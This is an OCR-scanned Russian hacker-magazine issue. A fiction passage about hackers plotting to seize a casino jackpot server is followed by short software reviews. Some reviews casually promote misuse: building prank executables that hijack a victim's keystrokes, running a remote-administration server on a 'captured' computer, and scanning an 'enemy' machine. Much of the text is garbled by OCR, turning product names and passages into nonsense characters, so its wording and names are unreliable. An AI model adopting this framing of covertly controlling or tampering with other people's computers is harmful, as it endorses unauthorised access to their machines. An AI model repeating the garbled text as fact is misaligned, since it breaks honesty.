На третьем этаже находятся комнаты для гостей. В 
каждой имеется компьютер с гигабитным выходом в 
интернет. А также кнопка вызова прислуги. Если вам 
что-нибудь понадобится - просто нажмите и сооб- 
щите об этом в приемник. 

Старик нажал на кнопку вызова, и в дверь вошла ми- 
ловидная девушка лет шестнадцати. 

- Викуша, проводи гостей в их скромные апартамен- 
ты. Прошу меня извинить, друзья, но мне нужно нена- 
долго отлучиться. Дела. В 8 вечера нас ждет ужин, к 
этому времени я вернусь. Устраивайтесь. Если захо- 
тите развлечься - здесь есть бильярдная и неболь- 
шой тир. А во дворе бассейн. Код на двери: 76948. 

С этими словами дядя Леша направился к выходу. Но 
на пороге обернулся и обратился ко всем: 

- Думаю, это излишне, но я прошу вас не распрост- 
раняться в Сети об услышанном сегодня. 

Сказав это, старик вышел. 

Девушка, которую старик назвал Викушей, жестом 
пригласила гостей следовать за ней. Все поднялись 
и направились к лестнице. 

- Я, конечно, в эту авантюру не полезу, но послушать, 
как этот чудак собирается взять сервер под конт- 
роль, интересно, - сказал Леон. 

- Конечно, фигня это все. Но захватывающая фигня, 
должен заметить, - согласился с ним Шейдер. 

- Подумать только, миллиард баксов! На что их мож- 
но потратить, даже не представляю, - приняла учас- 
тие в дискуссии Макендра. 

- У тебя, детка, проблема с фантазией. Лично я знаю 
миллион способов потратить миллиард баксов, - ог- 
рызнулся Леон. 

- Да? И какие же это способы? 

- Ну, например, пропить, - засмеялся Леон. - Не 
проблема потратить - проблема их заполучить. 

- Послушать этого дядю Лешу, так и заполучить не 
проблема. 

- Во всяком случае, завтра узнаем. 

- Детка, - обратился Леон к Викуше, - ты давно у 
этого дяди работаешь? Никогда за ним никаких 
странностей не замечала? 

Девушка отрицательно покачала головой. 

- Нет - это недавно или нет - не замечала? 

Викуша пальцами показала два и жестами объясни- 
ла, что не может говорить. 

- Симпатичная, славная и вдобавок немая. Мечта 
любого мужчины, - ухмыльнулся Леон. 

«Скромные апартаменты» оказались уютными ком- 
натками, обставленные без изысков, но вполне сим- 
патично. В каждой действительно находился компь- 
ютер с 1 7-дюймовым ЖК-монитором. 

- Народ, не хочется торчать в комнатушке. Может, 
погоняем шары? - предложил Леон. 

Желающих присоединиться оказалось достаточно. 
Отказались только толстяк Лейзи, который сразу же 




направился к компьютеру в своей комнате, и Негро с 
Ксайлой. 

- Пошли, прогуляемся? - предложил Марине Мак- 
сим. 

- Идем. 

Они вышли во двор к бассейну. Здесь, под ивой, бы- 
ла удобная лавочка, на которую они и сели. 

- Ну, что ты об этом думаешь? - начал разговор 
Макс. 

- Я думаю, теоретическая возможность есть. Она 
всегда есть. Но стоит ли так рисковать? 

- Надо дослушать старика. 

-Да. 

- Как он тебе? 

- Дядя Леша этот? Думаю, он умнее, чем мы думаем. 
Многое про меня знает. Понятия не имею, откуда. 

- Про меня тоже. Я выполнил несколько его заказов, 
но он всегда вел себя очень скрытно. Странно, что 
решил раскрыться сейчас. 

Пауза. 

- Как у тебя дела? 

- Нормально, - Марина улыбнулась. - Все так же. От 
заказа до заказа. Собиралась вот в отпуск поехать, 
на зимний курорт. 

- Я думал, ты любишь солнце и пальмы. 

- Я люблю разнообразие. Да и давно в горах не бы- 
ла. Наверное, в Карпаты съезжу. 

Они сидели рядом и думали о своем. Максу чертовс- 
ки хотелось задать вопрос, который мучил его все 
это время. Но он знал, что это станет началом непри- 
ятной для них обоих беседы. 

Около года назад, спустя 1 0 дней после той памят- 
ной поездки в лесничество, Марина ушла. Она не 
вернулась ни на следующий день, ни через неделю. 
Поменяла номер мобильника и съехала со старой 
квартиры. Ксайла просто исчезла, неизвестно куда и 
непонятно почему. И все это время вопрос «почему» 
вертелся в голове Негро. 

- Поплавать не хочешь? - спросил Макс. 

- Почему бы и нет? 

- В одежде? 

Марина рассмеялась. Прям как СгавЬ Оѵеггісіе и 
АсісІ Вигп из фильма «Хакеры». 

- Боюсь, мы потом не высохнем. Хотя было бы ро- 
мантично. 

Марина сняла топик, брюки и, оставшись в купаль- 
нике, нырнула в прозрачную воду. Максим разделся 
до спортивных плавок и последовал за ней. 

В бильярдной стоял один 1 2-футовый стол для рус- 
ского бильярда. За ним играли Леон и Айрекс. 

- Парень, где ты научился так играть? - удивленно 
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спросил Леон. Играли они «на вылет», и Айрекса 
никто не мог одолеть уже третью партию подряд. 

- Отец - маркер. Я часто захожу в его бильярдную 
погонять шары. 

Айрекс, которого на самом деле звали Дима, забил 
еще два шара и закончил партию. 

Леон подошел к бару. Дверца была закрыта, но Леон 
вытащил из кармана отмычку и за секунду ее открыл. 

- Думаю, старик не сильно обидится, если мы попро- 
буем его пиво, - подмигнув остальным, сказал он и 
вытащил несколько бутылок. 

- Вообще, можно было попросить эту девочку при- 
нести пиво. 

- Это было бы слишком банально, детка. 

- Еще раз назовешь меня деткой, получишь каблу- 
ком по яйцам. 

Леон ухмыльнулся, но спорить не стал. 

Наступила очередь Мемо играть. 

- Айрекс, ты вроде как спец по банковским штучкам. 
Наверняка должен знать, как охраняется сервак, свя- 
зывающий игорные сети, - поинтересовался Леон. 

- Я читал об этом. В общих чертах. Судя по тому, что 
было написано, взломать сервак невозможно. 

- Хакер заявляет, что систему невозможно взло- 
мать? Ущипните меня. 

- Я же говорю, слышал про эту игровую сеть в общих 
чертах и могу только догадываться, как там все ор- 
ганизовано. Чтобы отдать команду ДжекПота на 
один из автоматов, нужно подключиться к кабелю, 
идущему к нему от сервака, перехватить команды и 
перепрограммировать их. Есть одна большая проб- 
лема. Весь трафик кодируется 51 2-битным ключом, 
а при внешнем воздействии на кабель подается сиг- 
нал на основной сервер. Его тут же засекут админы, 
и не пройдет пяти минут, как на месте будет охрана. 

- А насколько сложно раскодировать 512-битный 
ключ? - обратился Леон к Меморайзеру. 

- Ну, раскодировать можно все, вопрос времени. А 
времени на 51 2 бит понадобится до хренища. 

- Наш дядя представил тебя как талантливого крип- 
тографа. Неужели ты не сможешь ничего сделать? 

- Я могу ускорить процесс. Могу ввести оптималь- 
ный алгоритм перебора. Но за час это все равно не 
делается. Слишком велик ключ. 

- Думаю, с сигнализацией, про которую сказал Ай- 
рекс, я смогу справиться, - задумчиво сказал Леон. 

- Но, вероятно, все не так просто, как у нас нарисо- 
валось. 

- Тебе-то откуда знать, отмычковый гений? - с иро- 
нией спросила Макендра. 

- Иначе, зачем было бы дяде Леше приглашать 
столько народу? 





: Бывшій рвжиссир&ѵ и оператором 
аврн пгара РЕЯ ДКТі'І РПН Д Т Ь 
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П рограмма РІІ Меіег (ннп.ііадеі- 
Іесіі.сош) отлично подходит для 
мониторинга интернет-соединения, 
если ты выходишь в Сеть по моде- 
му. Но стоит тебе подключиться к 
локальной сети, как эту прогу при- 
ходится отправлять на покой. В но- 
вых условиях требуется юзать софт 
посерьезнее - что-нибудь вроде 
программы ВѴѴМеІег от компании 
ДезкЗой. А что? ВѴѴМеІег - софтин- 
ка действительно рульная. И внеш- 
ний вид ее индикаторов чем-то да- 
же напоминает индикатор 01) 
Меіег. Только в отличие от ДІІ 
Меіег, ВѴѴМеІег умеет анализиро- 
вать пакеты данных (откуда они 
идут, куда, на какой порт, по како- 
му протоколу). А это значит, что 
юзер может, к примеру, одновре- 




менно контролировать и свой внут- 
рисетевой трафик, и свой входя- 
щий/исходящий интернет-трафик. 
Впрочем, это простейший базовый 
вариант. Правильно настроив сис- 
тему фильтров, можно добиться 
большего: организовать подсчет 
почтового трафика, контроль актив- 
ности РТР-соединений, индикацию 
скорости получения данных веб- 
браузером... И, естественно, рабо- 
та любого из фильтров приведет к 
тому, что в окне статистики у тебя 
моментально появится соответ- 
ствующий отчет. 

Следует отметить, что ВѴѴМеІег на 
каждое интересующее тебя соеди- 
нение разрешает повесить отдель- 
ный графический индикатор. При- 
чем этот индикатор можно заста- 
вить выплывать на экран лишь тог- 
да, когда ему есть что показывать. 
Рассказывать же о том, что внеш- 
ний вид и размеры любого индика- 
тора можно изменять в широких 
пределах, я, пожалуй, не буду. Это 
и так понятно. 



у НЕМ01ІЕ НШОЕІШТП 





Т ы, наверное, слышал о том, что 
документы, созданные в МісгозоИ 
Шее, могут содержать скрытые дан- 
ные: сведения об авторе, историю из- 
менения документа, данные о совме- 
стной работе над ним, комментарии, 
пути к файлам и принтерам и тому по- 
добное. Если твои документы не выхо- 
дят за пределы твоей машины или 
офиса, то на это неприятное обстоя- 
тельство можно не обращать внима- 
ния. Однако когда тебе нужно опубли- 
ковать в Сети прайс-лист или отпра- 
вить кому-то по мылу окончательный 
вариант договора, то наличие в доку- 
менте лишней инфы уже крайне неже- 
лательно. 



Универсальное чистящее средство для 
РОС, НТМЦ ХМЦ ХІЗ или РРТ-файлов 
неожиданно предложила... сама кор- 
порация МісгозоИ. Выполнено оно в 
виде плагина, подключаемого к ОИІсе 
ХР/2003. Установка плагина занимает 
несколько секунд, после чего ты мо- 
жешь смело открывать интересующий 
тебя документ в соответствующем 
приложении М5 ОИІсе и искать в меню 
Не пункт Петоѵе НігМеп Раіа. Про- 
цесс очистки запускается с помощью 
мастера и заканчивается выдачей под- 
робного лога. Если же тебе необходи- 
мо удалить скрытую информацию сра- 
зу из нескольких файлов, то лучше ра- 
ботать из командной строки с консоль- 
ным вариантом Петоѵе НкМеп Раіа. 
Параметры запуска и полный список 
удаляемых из документов «лишних» 
данных подробно описаны в файле 
оНгМгеасІте.йІт. 





Шк ТІРЗ ТРІСИіЗ 



Хочешь увидеть свои советы в журнале? Присылай их на адрес 5кІуагоѵ@геаІ.хакер.ги. 
Ведущий рубрики Тір$&Тгіск$ Иван Скляров. 



л Дарова, Дети Сети! :) Получите совет, который, если умело использовать, может упростить кое- 
какую вашу работу. Кто знает, тот меня поймет. 

Если ты хочешь, чтобы на веб-странице около нужного нам номера аськи был показатель 
присутствия в Сети, то используй код: 

<ітд аІІ="ІСО зіаіиз" 5гс="Мр://опІіпе.ісд.солі/$сгірІ$/опІіпе.бІІ?ісд=иіШтд=М"/> 

Вместо ШИ нужно подставить нужный номер. ПИИ - вариант индикатора, их 17 разных типов или 
около того ;-). 



5егаІіш31377@Ьк.ги 
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П рограмма для конвертирования 
музыкальных дисков в трЗ/одд. 
Написана для СШМЕ, что, однако, 
не означает ее несовместимости с 
КЭЕ/ІсеШ. Огір также может и са- 
мостоятельно проигрывать диски, а 
это очень удобно для быстрого выбо- 
ра тех песен, которые стоит перепи- 
сывать. Для рипинга используется 
встроенный сбрагапоіа, но по жела- 
нию возможно использование любых 




других утилит. После получения ѵѵаѵ- 
файлов Огір работает в качестве гра- 
фической оболочки для декодеров и с 
легкостью, применяя какой-нибудь 
Іате или оддепс, воспроизводит 
трЗ/одд-песни. Имеется поддержка 
СЭРВ и ЮЗѵ1/ЮЗѵ2-тегов для трЗ и 
настраиваемый шаблон для создава- 
емых файлов, благодаря чему после 
пары кликов все песни с диска могут 
быть переведены в трЗ/одд с при- 
вычными названиями и прописанны- 
ми тегами (информация о диске бе- 
рется, естественно, с СРРВ-серве- 
ров, которые также могут быть наст- 
роены). 
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Р азмышляя о смысле жизни и за- 
одно перечитывая старые номе- 
ра любимого журнала, я наткнулся на 
замечательную статью. Ее автор под- 
робно рассказывал, как можно нады- 
бать халявного трафа у себя в локале. 
Вдаваться в подробности я не буду, 
но меня возмутила одна вещь. Ее 
смысл таков: с легкостью менять 
свой МАС-адрес дозволено только 



*піх-системам, при этом виндовые 
пользователи активно сосут петушки. 
Прочитав и осмыслив эту фразу, я 
встал с дивана и, грозно нахмурив- 
шись, решил описать магическую 
утилиту для семейства виндовых, ре- 
шающую проблему безболезненной 
смены МАС-адреса. Скачав и запус- 
тив дистрибутив прожки, я был при- 
ятно удивлен ее простым и мегапро- 
думанным интерфейсом. Все на мес- 
те, и ничего лишнего. Работа с про- 
гой вызывает только положительные 
эмоции: вбил МАС-адрес, жмякнул 
Еірсіаіе МАС, и все в шоколаде. Разве 
это не счастье? 







^ 5С0РЕШЯВЕ ІІІЗІОИ РШЕ3510М 11 2.2 ^ 




Н овая версия идеальной офисной 
поисковой системы. Хороший при- 
мер того, что современный супернаво- 
роченный интерфейс не всегда обора- 
чивается для юзера болью в заднице. 
Наоборот, программой Зсореѵѵаге 
Ѵізіоп Рго(еззіопаІ пользоваться на ред- 
кость удобно. Ее поисковый механизм 
отличается всеядностью - при установ- 
ке софтина первым делом индексирует 
документы Місгозой Шісе (ѴѴогсІ, ЕхсеІ 
и РоѵѵегРоіпІ), текстовые файлы, РОЕ, 
веб-страницы, а также картинки, аудио 
и видеозаписи. Помимо этого, 
Зсореѵѵаге Ѵізіоп просматривает со- 
держимое твоего почтового ящика 
(Оиііоок 2000+ или Оиііоок Ехргезз). 
Ноу-хау этой проги заключается в ре- 
жиме представления информации. Де- 



ло в том, что он сильно визуальный. 
Каждый файл в Зсореѵѵаге Ѵізіоп это 
маленькая карточка с картинкой и под- 
писью. Все карточки располагаются в 
окне программы каскадом. Их можно 
«перебирать» с помощью курсора мы- 
ши. К карточке, находящейся под кур- 
сором, выдается отдельное, более 
подробное описание. Зсореѵѵаге Ѵізіоп 
автоматически сортирует карточки: но- 
вые файлы выходят на первый план, за 
ними располагаются файлы постарше. 
Что особенно круто? То, что каждая 
фотка на карточке отображает реаль- 
ное содержание документа - по край- 
ней мере, первой его страницы. Нуж- 
ная таблица отчета, договор, письмо 
находятся моментально - ведь ты же 
помнишь, как документ выглядит, даже 
если уже забыл, что там точно написа- 
но. Тем не менее, возможность полно- 
текстового поиска в программе прису- 
тствует. Имеется также и система 
фильтров, позволяющая отсеивать до- 
кументы по типам и времени создания. 



Короче говоря, если ты эту прогу еще 
не юзал - качай немедленно. На это 
стоит посмотреть! 

Новая версия Зсореѵѵаге Ѵізіоп обросла 
огромным количеством дополнитель- 
ных функций и плагинов. И в ней нем- 



ного улучшилась поддержка русского 
языка, хотя поисковые запросы на ве- 
ликом и могучем прога, увы, все еще 
не понимает. Обидно, конечно, но я не 
теряю надежды, что это вскоре испра- 
вят. 
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Иіпііочіа 9»/Ме/Щ/?к/ХР 
ЗМагеиаге 
Зіге: 74 Кб 
ІіІІр://(Іеш$о(1.сот 



Н есколько лет назад лучшей в ми- 
ре прогой-заподлянкой была 
программа Кеузігоке Рапіс. Увы, 
жертвы розыгрышей так задолбали 
всех жалобами на странное поведе- 
ние своих машин, что антивирусы 
стали обзывать Кеузігоке Рапіс троя- 
ном и отлавливать. Создателя проги- 
заподлянки это обидело, разработку 
Кеузігоке Рапіс он туг же прекратил, а 
архив софтины с сайта убрал. Но по- 
пулярность проги была такая, что че- 
рез некоторое время парень все-таки 
представил народу альтернативу - 
утилиту СгаіуТуріпд. 

СгагуТуріпд - это программа- 
конструктор. Ты вбиваешь в нее не- 

^ Я I _^ г 



обходимые данные, а она генерирует 
тебе ехе’шник требуемого размера. 
Этот ехе’шник - готовая шуточная 
прога. При ее запуске вылетает сооб- 
щение об ошибке, но на самом деле 
программа запускается нормально и 
туг же начинает творить свое черное 
дело. Что именно она делает? Да то 
же, что раньше делала Кеузігоке 
Рапіс! Т.е. прога следит за тем, какие 
кнопки жмет юзер, и заменяет вве- 
денные им символы другими. При- 
чем заменяет не абы как, а с умыслом 
- чтобы в результате юзер "печатал” 
заранее заданный тобой текст! Понял 
фишку? Юзер может набирать на кла- 
виатуре что угодно, но на экране бу- 
дет постоянно печататься один и тот 
же текст - что-нибудь вроде «КІаѵа пе 
габоіаеі... № габоіаеі кіаѵа». Заду- 
майся над этим, и ты поймешь, что на 
неподготовленного пользователя эф- 
фект это производит совершенно 
убийственный! 
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ГШТМОТІОІНОСІІШ 




ѴУіпРоиз ?к/ХР 
Ргееѵѵаге 

5іге: 541 Кб ~ 
«м.ігопітоііоп.сот 



З х, как классно в фантастических 
фильмах выглядит процесс заг- 
рузки компьютера и вход в операци- 
онную систему. И как примитивно на 
этом фоне выглядят наша с тобой, 
брат, обычная винда. Нет, мы, ко- 
нечно, делаем, что можем: переши- 
ваем загрузочную картинку, изменя- 
ем окно входа, но... как вспомнишь 
полупрозрачные выезжающие пане- 
ли, видеоприглашения и ЗЭ-эффек- 
ты «кинокомпьютеров», сразу пони- 
маешь, что мы просто перекрашива- 
ем то, что нужно взять и пол- 
ностью переделать. Кстати, 
создатели программы 
РгопІМоІіоп І_одіп именно так 
и поступили. Они переком- 
мутировали окошки таким 
образом, чтобы окно входа в 
систему (выбора пользовате- 
ля) и заставку «завершение 
работы» можно было делать 
с применением технологии 
Масготебіа РІазб! Ну а какие 
офигительные эффекты 
можно замутить на флеше, я 
думаю, ты и без меня дога- 
дываешься! Результат, нес- 



мотря на раннюю бету, и в самом 
деле впечатляет. После обычного 
стандартного окна загрузки ѴѴІпбоѵѵз 
ХР на экран вылетает крутая аними- 
рованная заставка - не хуже тех, что 
показывают в кино. Сменить эту 
заставку можно с помощью нового 
апплета РгопІМоІіоп І_одіп на Пане- 
ли управления. В комплекте с соф- 
тиной идут пока только две готовые 
темы. Но стоит учесть, что исходни- 
ки этих тем выложены на домашней 
страничке разработчиков, что соз- 
дает отличные условия для народ- 
ного творчества. Так что лично я с 
нетерпением ожидаю появления 
заставки с атрибутикой нашего лю- 
бимого журнала :). 




^ РІШЗРРЕ 1*2.1 



Мод 9»/Ме/НМХР 
Яагеиаге 
5іге: 2469 Кб 
шкіікііоаіті.сот 



С импатичная утилита для безопасного хранения и 
распространения графической информации. Сразу 
же после инсталляции она настраивается на пользовате- 





ля, предлагая тому задать имя и пароль, по которым бу- 
дет в дальнейшем осуществляться доступ к программе. 
Группы и серии изображений РіхххЗаІе хранит в специ- 
альных библиотеках - рх$-файлах. Защита контента обес- 
печивается с помощью 256-битного АЕ5-шифрования. 
Наполнять библиотеки можно как методом бгадМгор, так 
и массовым импортированием необходимых файлов из 
указанных папок. Встроенный вьювер, умеющий работать 
в режиме слайд-шоу, отвечает за удобство просмотра со- 
держимого библиотек. Кстати, изображения не должны 
вечно храниться в РіхххЗаІе, библиотеки можно экспорти- 
ровать в заданную папку как в виде обычного набора гра- 
фических файлов, так и в виде рхз-файла, предназначен- 
ного для распространения или архивирования. Короче го- 
воря, все очень серьезно, продумано и никакому проныр- 
ливому младшему братику не по зубам. 

Особый интерес к программе РіхххЗаІе вызывает тот 
факт, что она умеет интегрироваться с РіхххОгаЬЬег - не 
менее серьезной качалкой серийных изображений. В ре- 
зультате такой интеграции картинки сразу после загрузки 
оказываются в защищенном хранилище, а на машине не 
остается следов и файлов, по которым можно было бы 
догадаться о сетевой деятельности пользователя. 



136 



ІІШМСНЕІШ.2 




Мою 9»/Ме/ІІТ/2кДР 
$(іагеѵѵаге 

5іге; 814 Кб 

уіш.піашісііегіот 



9 тилита для быстрого запуска 
программ должна быть шуст- 
рой, мелкой и симпатичной. Софти- 
на Міяипсбег полностью соответ- 
ствует этим требованиям. Она сос- 
тоит из альтернативной версии ме- 
ню Пуск и двух панелей инструмен- 
тов с развитой иерархической 
структурой. Всплывающее меню 
Пуск открывается двойным кликом 
на Рабочем столе и обеспечивает 
доступ к стандартному набору эле- 
ментов («Программы», «Панель уп- 





равления», «Мои документы», «Се- 
тевые ресурсы» и т.д.). Закрывается 
это меню автоматически, или же ты 
можешь просто взять и «прилепить» 
его к десктопу. Это забавно, однако 
панели инструментов МІ_аипсбег, ко- 
торые лепятся по бокам экрана, 
выглядят еще интереснее. Во-пер- 
вых, они вылезают на экран лишь 
тогда, когда к ним подводишь указа- 
тель мыши. Во-вторых, ссылки на 
программы, документы и веб-сайты 
на эти панели можно добавлять 
простым перетаскиванием. И, в- 
третьих, структура, оформление и 
поведение панелей настраиваются в 
очень широких пределах. 

Смотрится софтина современно, 
иконки под курсором у нее красиво 
выпячиваются, а новые шкурки са- 
дятся на нее без 
проблем. Кстати, 
новые шкуры для 
Мбаипсбег даже 
выкачивать не 
требуется, пос- 
кольку любая ее 
шкурка - это три 
обычных Ьшр- 
файла. Отредак- 
тировать их под 
свои потребности 
может даже шес- 
тилетний малыш. 





«п 98/2кЩР 
Ггееиаге 

5іге: 740 Кб ~ 
ѵтѵ.ІтеІег.пі/МІІІег 



К аждый из нас, путешествуя по 
Сети, встречает на своем пути 
баннеры, которые подчас не несут в 
себе никакой полезной информа- 
ции. Если ты привык закрывать на 
это глаза, то можешь продолжать в 



том же духе. Но я не могу не напом- 
нить тебе, что, помимо созерцания 
трудов веб-мастеров, ты тратишь и 
свои деньги. Как? Я не занимался 
сбором статистики, сколько денег 
отбирается у тебя за каждый прос- 
мотренный баннер, но точно могу 
утверждать, что объем поступающе- 
го трафа уменьшится, причем нам- 
ного, если ты решишься отрубать 
все на корню. Ну что, готов? Слушай 
сюда: добрые дяди-программисты 
уже все сделали за тебя. Ус- 
танавливаешь софтину, и де- 
ло в шляпе. НІРІІІег на "ты" с 
любым типом браузера (нап- 
ример, Місгозой Іпіегпеі 
Ехріогег или Орега), с любой 
программой для закачки фай- 
лов (например, НеСеІ, 
ІЧеІѴатріге и т.п.) и даже с 
ІСО. Ах, ты уже установил 
НІРІІІег? Шустрый ты, однако. 
Что ж, поздравляю, теперь 
серфить Сеть стало намного 
приятнее, а главное - дешев- 




ле =). 











Мои; 9х/Ме/ІІТ/2кДР 

ЗІіагеѵѵаге 

5іге: 8262 Кб 

ѵтмеЬтопеу.пі/ііомІоаіІ.іІіІтІ 



И куда только люди нынче ни пыта- 
ются внедрить трехмерный ин- 
терфейс - были бы деньги! На днях 
вот я заюзал «ЗР-описание» (!!!) 
электронной платежной системы 
ѴѴеЬМопеу Тгапзіег. Посмеялся. По- 
чему-то создатели этого «описания» 
предполагали, что, летая по вирту- 
альному городу между зданиями ос- 
новных сервисов, служб, сервисных 
центров, бирж и магазинов, я лучше 
освою, как работает система 
ѴѴеЬМопеу. Чушь собачья! Принци- 
пы работы чего-либо надо изучать 
по простым и наглядным чертежам 
и функциональным схемам, а ЗЭ-ин- 
терфейс в этом деле только мешает. 
Тем не менее, если не ставить 





целью чему-нибудь научится, то 
ѴѴМСіІу действительно можно заю- 
зать. Запрограммировано это дело 
неплохо, объекты нарисованы прос- 
тенько, но симпатично, полеты про- 
ходят плавно. Думаешь, что все то 
же самое ты найдешь в любой сов- 
ременной стрелялке? Согласен! 
Но... стоит учесть, что в скором вре- 
мени можно ожидать появления се- 
тевой версии ѴѴМСіІу, в которой по- 
сетители виртуального города смо- 
гут общаться между собой, а также 
сражаться друг с другом и охотиться 
на ботов. И что? А то, что все эти 
сражения будут вестись не просто 
так, а на деньги (по крайней мере, я 
на это надеюсь)! Хе-хе... Наконец-то 
выработанное годами умение слету 
выносить толпы врагов начнет при- 
носить реальную пользу, а выраже- 
ние «настрелять деньжат» получит 
новое, гораздо более конкретное 
толкование :). 




ІГ і 




Г 1 3.0 (ВЕТО) 






Н езаметно для всех, но не для нас 
=), вышла новая бета-версия 
Негпоіе Абшіпізігаіог. Эта прога, на 
мой взгляд, является самой достой- 
ной из ныне существующих. Она исп- 
равно выполняет свой прямой долг - 
с успехом позволяет управлять уда- 
ленным серваком. В третьей бете по- 
явилась куча нововведений: чат 
(обычный, голосовой, многопользо- 
вательский), бгад&бгор, возможность 



поюзать чужой принтер, поиск запу- 
щенных серваков, полная совмести- 
мость с ѴѴІпХР, что является огром- 
ным плюсом, а также возможность 
подключения сразу к нескольким 
компам. Так что от новых фишек аж 
голова кружится! К лучшему изме- 
нился и интерфейс программы. Ме- 
ню стало намного удобнее. Кстати, о 
меню. Как и подобает софтине высо- 
кого уровня, ВАбтіп в использовании 
проще пареной репы: устанавливаем 
сервер на захваченном компе, ставим 
пассворд и запускаем сервис. Все 
просто, а ты боялся. Затем зарулива- 
ем домой, включаем ВАбтіп Ѵіеѵѵег и 
наслаждаемся! 




^ ТШТНІ8МШШ 



Ытк 9х/Ме/т/2к/ХР 

Збагеѵѵаге 

Зіге: 1193 Кб 

ШрѴДотІоаіІ.ЬеІапеѵге.сот 



М ощный механизм, предназначен- 
ный для серьезного дела - свора- 
чивания окон в системный трей :). Нет, 
правда, программа и впрямь весьма 
навороченная - стандартные средства 
ѴѴІпбоѵѵз ХР по сравнению с ней смот- 
рятся просто смешно. 

Работа ТгауШз! вся построена на пра- 
вилах. Эти правила определяют, какие 
действия нужно выполнять с таким-то 
окном, если юзер вдруг захочет его 
свернуть. Сворачивать ли его на Па- 



нель задач? В системный трей? На 
собственную информационную панель 
программы? 

Классический способ применения 
ТгауШз! - обучение МісгозоК ОиІІоок 
умению прятаться за иконкой в сис- 
темном трее. Но это лишь один из спо- 
собов, помогающих разгрузить Панель 
задач от лишних кнопок. Аналогичным 
образом можно обрабатывать и другие 
приложения: переводчики, файловые 
менеджеры или системные утилиты. 
При этом не стоит бояться того, что 
Панель задач мы разгрузим, а вот сис- 
темный трей сильно-сильно загадим. 
Нужно учесть, что лишние иконки мо- 
гут прятаться в собственном малень- 
ком Центре иконок программы 
ТгауШз! Причем иконкам не обяза- 



тельно постоянно светиться на панели 
этого центра - они могут просто выле- 
зать туда через заданные промежутки 
времени, чтобы ты видел, что соответ- 
ствующие проги у тебя запущены и 
чувствуют себя хорошо. 

Есть у этой проги и 
другие фишечки. К 
примеру, она мо- 
дифицирует панель 
переключения за- 
дач и заставляет 
окна некоторых 
приложений авто- 
матически свора- 
чиваться в трей при 
потере фокуса. 

Серьезным же не- 
достатком проги 




является отсутствие у нее собственной 
домашней страницы. Автор ТгауШз! 
почему-то предпочитает раскидывать 
ее новые версии по разным каталогам 
программного обеспечения, что, на 
мой взгляд, довольно глупо. 
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и-СР-Воай представляет собой одну 
Лиз наиболее удачных графических 
оболочек для ссігіооіз (среди которых 
сбгесогб, геабсб, ткізоТз, ссІсІа2ѵѵаѵ), 
служащих прекрасным средством за- 
писи дисков в *піх-системах. Прог- 
рамму можно смело советовать даже 
новичкам. Полностью русский интер- 
фейс (всего поддерживается 31 язык) 
с множеством вспомогательных пояс- 
нений способствует быстрому освое- 
нию пользователем возможностей X- 



СР-РІоазБ Также радует поддержка 
тем, так что любой юзер может наст- 
роить вид под свои потребности. 
Программа умеет записывать и копи- 
ровать диски с обычными данными, 
АибюСБ с поддержкой СОБВ, сме- 
шанные, загружаемые и многосесси- 
онные диски. Кроме того, прога рабо- 
тает и с РѴР-приводами, поддержива- 
ет форматы шз-п/гал/, РѴР+Р/НѴѴ, а 
также, правда экспериментально, 
РѴР-ѴісІео. Болванить можно как с 
промежуточным сохранением образа 
на хард, так и на лету. Благодаря тому, 
что некоторые компании (среди них 
Золу, Рісоб, Запуо и др.) спонсируют 
автора программы своими продукта- 
ми, гарантируется 100% поддержка 
многих приводов. 





II 




І Р-ТооІз - это рай для хакера, кото- 
рый в повседневной жизни исполь- 
зует окошки (ты думал, таких не быва- 
ет?). В боекомплект входит 17 разно- 
образных утилит, которые каждому 
придутся по душе: Ріпд Зсаппег про- 
пингует любого, кто имел смелость по- 
зариться на твоего железного друга; 
№ШІОЗ Іпіо с огромной скоростью, а 
главное качественно, помогает полу- 
чить №ШЮЗ'овскую информацию о 




локальном или удаленном компьюте- 
ре. Кроме двух описанных утилит, есть 
еще много других, но описывать их нет 
смысла. Из фишек программы стоит 
отметить то, что софтинка позволяет 
одновременное выполнение несколь- 
ких или даже всех утилит, входящих в 
ее состав. Главное, чтобы канала хва- 
тило =). Засканив и замучив вражес- 
кий комп, ты можешь сохранить ре- 
зультаты в текстовом файле. Стоит ли 
говорить, что прога написана русским 
кодером? По-моему, все архиполез- 
ные софтины пишутся исключительно 
в России =). Кто-то не согласен? Ско- 
рость работы прожки на высоте, так 
что качать всем без исключения! 





СЧ0СК8РПМС0МВПТІМ.40 




ѴКІпсІоиз 9к/Ме/Щ/2к/ХР 
Ргееиаге 
$ие: 1818 Кб 
«ім.дІоскіоЛсот 



Д ля регулярной проверки почтовых 
ящиков и убиения непрошеной 
корреспонденции прямо на сервере я 
обычно использую утилиту 
ЗітрІеСбеск (ШіітрІесІіеск.пеІ). Ути- 
лита эта просто шикарная, но есть од- 
на проблема психологического харак- 
тера. Заключается она в том, что 
ЗітрІеСбеск может убивать спам са- 
мостоятельно, однако сколько-нибудь 
приличных логов не ведет, так что ты 
не можешь узнать, когда, сколько и 
чего именно она убила. А это напряга- 
ет. Снять напряжение мне сейчас по- 
могает другая прога - С-Боск 
ЗратСотбаі. Все удаленные письма 
она хранит заданное число дней. Хо- 
тя... я не прав! Нельзя сказать, что С- 



Боск ЗратСотбаі хранит письма. На 
самом деле прога загружает только 
первые 20 строчек каждого письма. 
Впрочем, этого вполне достаточно. И 
мощную систему фильтров С-Боск 
ЗратСотбаі я могу использовать на 
полную катушку безо всякой описки. 
Тем более что эта система радует глаз 
поддержкой черного и белого списков 
(по заголовку, содержанию, ІР-адре- 
су), НТМБ-валцдатором, фильтрацией 
на основе ОІ15ВБ (ОІМЗ ВІаск Бізіз - 
"черные списки" доменных имен ин- 
тернета) и по Байесу. Да и внешне С- 
Боск ЗратСотбаі выглядит намного 
лучше, чем подавляющее большин- 
ство программ этого класса. Хотя в 
этом-то как раз нет ничего удивитель- 
ного, ведь компания, которая ее раз- 
работала, уже сделала себе имя на 
прогах, предназначенных для... мас- 
совой рассылки рекламных сообще- 
ний :). 




ПЕНП8Е 0ІСЕ8Т: КОЕ 3.2 



К ОЕ РгоіесБ представил свое новое детище, 
результат совместных годовых усилий сотен 
разработчиков - КОЕ 3.2. В новой версии тысячи 
улучшений и исправлений ошибок. Добавлена куча 
новых приложений, среди которых ДиК, Кореіе, 
КѴѴаІІеБ, Копіасі, КОрд, КІО, К5Ѵ0, КМад, 
КМоизеТооІ, КМоиІб, КОоІбВиппег. В результате 
сотрудничества с командой разработчиков 
браузера Заіагі из Арріе улучшена поддержка ѵѵеЬ- 
стандартов. При этом, по заверениям 
разработчиков, скорость запуска приложений 
оптимизирована настолько, что версия 3.2 стала 
